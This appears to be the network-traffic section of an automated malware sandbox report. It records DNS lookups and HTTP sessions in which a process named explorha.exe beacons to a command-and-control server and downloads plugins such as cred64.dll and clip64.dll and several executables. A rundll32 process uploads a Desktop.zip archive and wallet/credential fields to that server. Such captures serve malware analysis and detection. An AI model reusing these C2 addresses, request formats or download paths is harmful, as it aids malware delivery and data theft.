| Apr 19, 2024 03:29:48.170654058 CEST | 192.168.2.5 | 1.1.1.1 | 0x216 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:52.652167082 CEST | 192.168.2.5 | 1.1.1.1 | 0x206e | Standard query (0) | play.google.com | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:52.652417898 CEST | 192.168.2.5 | 1.1.1.1 | 0x97bc | Standard query (0) | play.google.com | 65 | IN (0x0001) | false |
| Apr 19, 2024 03:30:06.646387100 CEST | 192.168.2.5 | 1.1.1.1 | 0xf8f4 | Standard query (0) | b-stamps.gl.at.ply.gg | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:30:20.953000069 CEST | 192.168.2.5 | 1.1.1.1 | 0xf3ac | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:30:20.954009056 CEST | 192.168.2.5 | 1.1.1.1 | 0xaa5b | Standard query (0) | www.google.com | 65 | IN (0x0001) | false |
| Apr 19, 2024 03:30:33.901623964 CEST | 192.168.2.5 | 1.1.1.1 | 0xfe73 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:31:25.902829885 CEST | 192.168.2.5 | 1.1.1.1 | 0x4425 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:32:28.182463884 CEST | 192.168.2.5 | 1.1.1.1 | 0x14f1 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Apr 19, 2024 03:29:16.735898018 CEST | 1.1.1.1 | 192.168.2.5 | 0x9d83 | No error (0) | www.youtube.com | youtube-ui.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 19, 2024 03:29:16.735898018 CEST | 1.1.1.1 | 192.168.2.5 | 0x9d83 | No error (0) | youtube-ui.l.google.com | | | 65 | IN (0x0001) | false |
| Apr 19, 2024 03:29:16.736232996 CEST | 1.1.1.1 | 192.168.2.5 | 0x4547 | No error (0) | www.youtube.com | youtube-ui.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Apr 19, 2024 03:29:16.736232996 CEST | 1.1.1.1 | 192.168.2.5 | 0x4547 | No error (0) | youtube-ui.l.google.com | | 64.233.185.136 | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:16.736232996 CEST | 1.1.1.1 | 192.168.2.5 | 0x4547 | No error (0) | youtube-ui.l.google.com | | 74.125.138.190 | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:16.736232996 CEST | 1.1.1.1 | 192.168.2.5 | 0x4547 | No error (0) | youtube-ui.l.google.com | | 173.194.219.136 | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:16.736232996 CEST | 1.1.1.1 | 192.168.2.5 | 0x4547 | No error (0) | youtube-ui.l.google.com | | 74.125.138.91 | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:16.736232996 CEST | 1.1.1.1 | 192.168.2.5 | 0x4547 | No error (0) | youtube-ui.l.google.com | | 173.194.219.91 | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:16.736232996 CEST | 1.1.1.1 | 192.168.2.5 | 0x4547 | No error (0) | youtube-ui.l.google.com | | 64.233.177.91 | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:16.736232996 CEST | 1.1.1.1 | 192.168.2.5 | 0x4547 | No error (0) | youtube-ui.l.google.com | | 64.233.185.91 | A (IP address) | IN (0x0001) | false |
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com64.233.185.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com64.233.177.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com74.125.138.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com173.194.219.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com142.251.15.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com64.233.185.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com142.251.15.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com74.125.138.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.736232996 CEST1.1.1.1192.168.2.50x4547No error (0)youtube-ui.l.google.com173.194.219.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.034960985 CEST1.1.1.1192.168.2.50x1bb3No error (0)www.google.com142.250.9.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.034960985 CEST1.1.1.1192.168.2.50x1bb3No error (0)www.google.com142.250.9.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.034960985 CEST1.1.1.1192.168.2.50x1bb3No error (0)www.google.com142.250.9.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.034960985 CEST1.1.1.1192.168.2.50x1bb3No error (0)www.google.com142.250.9.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.034960985 CEST1.1.1.1192.168.2.50x1bb3No error (0)www.google.com142.250.9.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.034960985 CEST1.1.1.1192.168.2.50x1bb3No error (0)www.google.com142.250.9.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:21.035022974 CEST1.1.1.1192.168.2.50xffc6No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)accounts.youtube.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)www3.l.google.com108.177.122.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)www3.l.google.com108.177.122.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)www3.l.google.com108.177.122.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)www3.l.google.com108.177.122.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)www3.l.google.com108.177.122.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.405831099 CEST1.1.1.1192.168.2.50xb67eNo error (0)www3.l.google.com108.177.122.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.406708002 CEST1.1.1.1192.168.2.50xbe10No error (0)accounts.youtube.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:24.801657915 CEST1.1.1.1192.168.2.50xb256No error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:25.381839991 CEST1.1.1.1192.168.2.50xd206No error (0)db-ip.com104.26.5.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:25.381839991 CEST1.1.1.1192.168.2.50xd206No error (0)db-ip.com172.67.75.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:25.381839991 CEST1.1.1.1192.168.2.50xd206No error (0)db-ip.com104.26.4.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.845652103 CEST1.1.1.1192.168.2.50x32a1No error (0)play.google.com74.125.138.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.845652103 CEST1.1.1.1192.168.2.50x32a1No error (0)play.google.com74.125.138.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.845652103 CEST1.1.1.1192.168.2.50x32a1No error (0)play.google.com74.125.138.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.845652103 CEST1.1.1.1192.168.2.50x32a1No error (0)play.google.com74.125.138.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.845652103 CEST1.1.1.1192.168.2.50x32a1No error (0)play.google.com74.125.138.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.845652103 CEST1.1.1.1192.168.2.50x32a1No error (0)play.google.com74.125.138.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:48.276201963 CEST1.1.1.1192.168.2.50x216No error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.756506920 CEST1.1.1.1192.168.2.50x206eNo error (0)play.google.com142.250.105.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.756506920 CEST1.1.1.1192.168.2.50x206eNo error (0)play.google.com142.250.105.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.756506920 CEST1.1.1.1192.168.2.50x206eNo error (0)play.google.com142.250.105.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.756506920 CEST1.1.1.1192.168.2.50x206eNo error (0)play.google.com142.250.105.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.756506920 CEST1.1.1.1192.168.2.50x206eNo error (0)play.google.com142.250.105.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:52.756506920 CEST1.1.1.1192.168.2.50x206eNo error (0)play.google.com142.250.105.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:06.983123064 CEST1.1.1.1192.168.2.50xf8f4No error (0)b-stamps.gl.at.ply.gg147.185.221.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.057634115 CEST1.1.1.1192.168.2.50xf3acNo error (0)www.google.com142.250.9.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.057634115 CEST1.1.1.1192.168.2.50xf3acNo error (0)www.google.com142.250.9.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.057634115 CEST1.1.1.1192.168.2.50xf3acNo error (0)www.google.com142.250.9.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.057634115 CEST1.1.1.1192.168.2.50xf3acNo error (0)www.google.com142.250.9.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.057634115 CEST1.1.1.1192.168.2.50xf3acNo error (0)www.google.com142.250.9.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.057634115 CEST1.1.1.1192.168.2.50xf3acNo error (0)www.google.com142.250.9.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.060080051 CEST1.1.1.1192.168.2.50xaa5bNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:34.011050940 CEST1.1.1.1192.168.2.50xfe73No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:26.008399010 CEST1.1.1.1192.168.2.50x4425No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:28.292335033 CEST1.1.1.1192.168.2.50x14f1No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49713 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:03.313673019 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:29:03.558506012 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Apr 19, 2024 03:29:03.560514927 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:03.820668936 CEST | 558 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                      Data Ascii: 16f <c>1000054001+++aa0ed36554e19fbffc5144f69e5e67ee8015f815db2cd0a0a3e626b3fcf7b6587fa0e17e76#1000055001+++e312d3611ef49fa1f45b59ea9f5e7af18214e40adc2dc8e2a7e12df9b2e8b2446fe1e928766ada#1000056001+++e312d3611ef49fa1f45b59ea9f5e7af18214e40adc2dc8e2a9e730e8b2e8b2446fe1e928766ada#1000057031+++aa0ed36554e19fbffc5144f69e5e67ee8015f815db2cd0aea5fb37b3eefba1586aa0e17e76#<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49714 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe

Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:03.315207005 CEST | 69 | OUT | GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1
Host: 193.233.132.56
Apr 19, 2024 03:29:03.560641050 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:03 GMT
Content-Type: application/octet-stream
Content-Length: 1285632
Last-Modified: Sun, 03 Mar 2024 11:54:33 GMT
Connection: keep-alive
ETag: "65e464f9-139e00"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49715 | 193.233.132.167 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe

Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:04.067647934 CEST | 55 | OUT | GET /mine/amert.exe HTTP/1.1
Host: 193.233.132.167
Apr 19, 2024 03:29:04.311078072 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:04 GMT
Content-Type: application/octet-stream
Content-Length: 1905152
Last-Modified: Fri, 19 Apr 2024 00:37:12 GMT
Connection: keep-alive
ETag: "6621bcb8-1d1200"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49716 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:06.864746094 CEST | 69 | OUT | GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1
Host: 193.233.132.56
Apr 19, 2024 03:29:07.115953922 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:06 GMT
Content-Type: application/octet-stream
Content-Length: 112128
Last-Modified: Sun, 03 Mar 2024 11:54:32 GMT
Connection: keep-alive
ETag: "65e464f8-1b600"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49717 | 193.233.132.56 | 80 | 3356 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:07.505716085 CEST | 176 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 21
Cache-Control: no-cache
Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
Data Ascii: id=246122658369&cred=
Apr 19, 2024 03:29:07.749847889 CEST | 190 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Apr 19, 2024 03:29:17.858675003 CEST | 172 | OUT | POST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----NDYyMQ==
Host: 193.233.132.56
Content-Length: 4781
Cache-Control: no-cache
Apr 19, 2024 03:29:17.858675003 CEST | 140 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 79 4d 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
Data Ascii: ------NDYyMQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
Apr 19, 2024 03:29:18.137715101 CEST | 190 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49718 | 193.233.132.56 | 80 | 1164 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:08.315222025 CEST | 159 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 5
Cache-Control: no-cache
Data Raw: 77 6c 74 3d 31
Data Ascii: wlt=1
Apr 19, 2024 03:29:08.573810101 CEST | 719 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49719 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:11.518091917 CEST | 186 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
Data Raw: 64 31 3d 31 30 30 30 30 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
Data Ascii: d1=1000054001&unit=246122658369
Apr 19, 2024 03:29:11.769224882 CEST | 193 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4 <c>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49720 | 193.233.132.167 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:12.018898964 CEST | 56 | OUT | GET /mine/random.exe HTTP/1.1
Host: 193.233.132.167
Apr 19, 2024 03:29:12.260936975 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:12 GMT
Content-Type: application/octet-stream
Content-Length: 1166336
Last-Modified: Fri, 19 Apr 2024 00:36:20 GMT
Connection: keep-alive
ETag: "6621bc84-11cc00"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49721 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:15.465560913 CEST | 186 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
Data Raw: 64 31 3d 31 30 30 30 30 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
Data Ascii: d1=1000055001&unit=246122658369
Apr 19, 2024 03:29:15.715399981 CEST | 193 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4 <c>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49722 | 193.233.132.167 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:15.978332996 CEST | 56 | OUT | GET /cost/random.exe HTTP/1.1
Host: 193.233.132.167
Apr 19, 2024 03:29:16.221138000 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:16 GMT
Content-Type: application/octet-stream
Content-Length: 2295808
Last-Modified: Fri, 19 Apr 2024 00:36:37 GMT
Connection: keep-alive
ETag: "6621bc95-230800"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49741 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:21.206724882 CEST | 186 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
Data Raw: 64 31 3d 31 30 30 30 30 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
Data Ascii: d1=1000056001&unit=246122658369
Apr 19, 2024 03:29:21.453392029 CEST | 193 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4 <c>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49746 | 193.233.132.167 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:21.996984005 CEST | 55 | OUT | GET /cost/sarra.exe HTTP/1.1
Host: 193.233.132.167
Apr 19, 2024 03:29:22.245256901 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:22 GMT
Content-Type: application/octet-stream
Content-Length: 2310656
Last-Modified: Fri, 19 Apr 2024 00:36:46 GMT
Connection: keep-alive
ETag: "6621bc9e-234200"
Accept-Ranges: bytes
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.493360043 CEST1289INData Raw: da 25 f6 73 c9 35 a0 90 dd b8 81 4a ec 95 33 83 f3 8d 71 d4 4b b4 c1 96 68 98 25 ba 97 1a d0 e0 53 70 0b 04 e8 52 ca f1 29 c6 d0 4c 76 50 ee 74 9c 72 8c aa fa 55 e0 97 e9 44 85 45 10 02 d3 64 84 0d 5b 10 e2 2e 2a 1d 27 66 92 94 af 28 4e 5c 45 48
                                                                                                                                                                                                                                      Data Ascii: %s5J3qKh%SpR)LvPtrUDEd[.*'f(N\EHJ7O?;P@i\<2='`OV@D4 .MB*lp"A#c x,Rl%sXHlNdm.dRx$r:AKpL|]6JnB|bmB$1P<fWf +I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49768 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe

Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:25.875488043 CEST | 186 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
Data Raw: 64 31 3d 31 30 30 30 30 35 37 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
Data Ascii: d1=1000057031&unit=246122658369
Apr 19, 2024 03:29:26.126251936 CEST | 193 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4 <c>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49769 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe

Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:26.487627983 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:29:26.732089996 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:29:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Apr 19, 2024 03:29:26.736044884 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
